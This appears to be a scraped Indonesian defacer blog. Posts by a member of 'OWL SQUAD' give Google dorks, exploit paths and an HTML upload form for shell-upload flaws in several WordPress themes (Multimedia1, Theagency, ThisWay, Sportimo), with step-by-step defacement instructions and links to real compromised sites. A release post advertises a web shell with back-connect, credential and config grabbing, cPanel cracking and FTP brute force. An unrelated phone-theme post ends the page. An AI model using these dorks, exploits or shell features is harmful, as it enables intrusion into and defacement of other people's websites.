Termux ID: Theme -->

 Deface Wordpress Themes Multimedia1

 

Hello sobat maxteroit, kali ini saya (Berandal) akan share my new POC about deface wordpress, metodenya yaitu Wordpress themes multimedia1 shell upload vulnerability.
Berikut dokumentasi yg telah saya upload ke web tempat upload poc hacking :

   
Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


[*] ABOUT:

Facebook: https://www.facebook.com/owlsquad.id
Twitter: https://www.twitter.com/id_berandal
Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.

Deface Wordpress Themes Multimedia1



Tampilan Halaman Login



Haii, Kali ini gw mau share Shell buatan gw sendiri :) Shell ini gw recode dari IndoXploit Shell First Edition.
Thanks buat IndoXploit Coders Team. :)

Semua fitur dalam shell ini dibuat Auto.
Tinggal Klik-Klik sajaa.

Tampilan Shell

Fitur:

K-RDP Shell
-> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
Back Connect

CPanel/FTP Auto Deface:
-> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp sajatidak semuanya bisa hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface.

Config Grabb :
-> Popoji CMS
-> Voodoo CMS
-> Wordpress
-> Joomla
-> Drupal
-> Magento
-> Ellislab Devteam [CI]
-> Opencart
-> Prestashop
-> phpBB
-> Lokomedia
-> Sitelook
-> Bosweb
-> WHMCS
-> Cpanel

Jumping [error fixed] :
Jumping hpshere & Jumping /var/vhosts [ updated ]
Kelebihannyaa bisa langsung ambil nama domainnyaa :
Cpanel Crack [blank user/pass fixed]:
Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.

Dan fitur tambahan :

  1. Server Info.
  2. PHP Info.
  3. Who Is Lookup.
  4. Safe Mode.
  5. Shell Finder.
  6. FTP Brute Force.
  7. Bypass etc/passw.
  8. CMS Lokomedia Exploiter.
  9. CMS Balitbang Exploiter.
  10. Port Scan.
  11. Zip Menu, [Upload and Unzip, ZIP Backup, Unzip Manual].
  12. Shell Checker.
  13. Hash ID.
  14. String Encoder.
  15. Network [Bind Port, Back Connect, Metasploit Connection].
========================================================================
========================================================================
Selamat Menikmati :)

Spesial Thanks:
.

Regards,
Berandal, [OWL SQUAD]

[RELEASE] Berandal Shell First Edition V.1



Haii fans :P
Kali ini gw mau share Tutorial Deface Wordpress Theme Theagency. :)

Bahan:
1. Dork.
inurl:/wp-content/themes/theagency
2. Exploit.
/wp-content/themes/theagency/includes/uploadify/uploadify.php

3. CSRF.
 Ambil disini.

Langkah - Langkah:

1. Dorking ke google.

2. Pilih salah satu site.

3. Masukin exploitnya.

4. Vuln = Blank.

5. Masukin site ke CSRF.

6. Pilih file/shell/ yg mau lu upload.

7. Kalo file sukses ke upload, bakal muncul angka '1'.

Akses file? 
/wp-content/themes/theagency/includes/uploadify/uploads/namafile 
contoh:
http://google.com/wp-content/themes/theagency/includes/uploadify/uploads/namafile

Kalo masih kurang jelas, simak video tutorial gw :

 

Okee, sekian tutorial gw kali ini, semoga bermanfaat :)

Regards, 

Deface Wordpress Theme Theagency

Hallo fanss :* Berandal disini :)
Kali ini gw mau share Tutorial Deface Wordpress Themes ThisWay . Sebenernya ini Bug lama, tapi gada salahnya share :v Sapa tau masih Crotz :P


Bahan:
1. Xampp (DOWNLOAD)
2. Exploter (PHP) - [SEDOT]
2. CSRF (Buat yg males pake xampp :v) [SEDOT]
3. Shell atau Script Deface (Kalo belom punya, bisa ambil disini.)


Langkah:
1. Dorking di google.

2. Pilih salah satu site.

3. Masukin exploitnya.

4. Vuln:
{"status":"NOK", "ERR":"This file is incorect"}

5. Masukin ke CSRF

6. Kalo sukses bakal kluar nama file lu :)

7. Akses file?
site.co.li/wp-content/uploads/2017/02/namafile
contoh:
http://larryfarfan.com/wp-content/uploads/2017/02/settingsimage_h5aQ4ZfXcBYM6gSM.txt

Masih kurang jelas?
Simak video gw dibawah :)



Okee, cukup buat tutorial kali ini, Semoga Bermanfaat :)
.
Regards,
Berandal, [OWL SQUAD]

Deface Wordpress Themes ThisWay




Pagi fans :* Please say hello haters :P
Kali ini gw mau ksaih Tutorial Deface Wordpress Themes Sportimo.  Tutorial ini gak beda jauh sama tutorial sebelumnya :D

Baca: Tutorial Deface Wordpress Themes Radial.

Oke, sebelumnya kita siapin dulu bahan2 nya :D 

Bahan:  
 1. Dork
inurl:/wp-content/themes/sportimo 
2. Exploit
/wp-content/themes/sportimo-theme/functions/upload-handler.php
contoh
site.com/wp-content/themes/sportimo-theme/functions/upload-handler.php

3. Shell Backdoor atau Script Deface
Belum punya? Nih, Script Deface sederhana gw, COMOT

4. CSRF
CSRF copy disini. Simpan dalam format .html

Langkah - Langkah:
1. Dorking ke google.

2. Pilih salah satu site.

3. Masukkan exploitnya.

4. Kalo vuln bakal ada tulisan 'error'. Contoh:

  
5. Copy link yg vuln, paste di CSRF.

6. Buka CSRF, pilih file yg mau diupload, klik SIKAT!
NB: Kalo mau upload shell, rename dulu jadi .phtml contoh: shell.phtml

7. Kalo file sukses ke upload, bakal keluar nama file lu.

8.  Sekarang tinggal panggil file lu. Caranya?
/wp-content/uploads/tahun/bulan/namafile
contoh
http://kregle.net/wp-content/uploads/2017/01/o.phtml 

Kalo masih bingung, bisa liat video tutorial gw di bawah :)



 Ini hasil mirror an gw :
https://www.defacer.id/244106.html
https://1337mirror.com/12447.html

 Oke, sekian tutorial gw kali ini, see u next post :*

Regards,
Berandal, [OWL SQUAD]

Deface Wordpress Themes Sportimo

Theme Rom Emui






Apa kabar sohib maxter, di postingan kali ini ane bakal share kumpulan Theme untuk Rom Emui.
 Kenapa saya share theme Emui, pasti kalian tau lah.
Alasannya karena kalian pasti merasa bosan dengan theme emui yg gitu-gitu aj yah kan, sama kaya ane pengguna rom emui juga yg bosan melihat theme yg gitu2 aj. 

langung aja, berikut list-list theme Emui :



1.  Theme Bunny, ss ? pake aj dulu, link nya disini ===> Download Disini 

2.  Theme Sunset, link nya disanaa ===> Download Disini

3.  Theme Wave, link nya disituuu =====> Download Disini

4.  Theme Lava, link nya tuh di jonggol =====> Download Disini

5.  Theme Pixel Emi v7.0, link nya tuhh di amriik =====> Download Disini

 Sumber theme-nya tertera di themanya,

Cara pasangnya yaitu simpan file .hwt nya di internal > HWThemes, lalu buka lagi di aplikasi ganti temanya, Done

Jika ada keluhan apapun, silahkan Berkomentar di kolom komentar yang sudah disediakan,

Terima kasih 

Kumpulan theme Rom Emui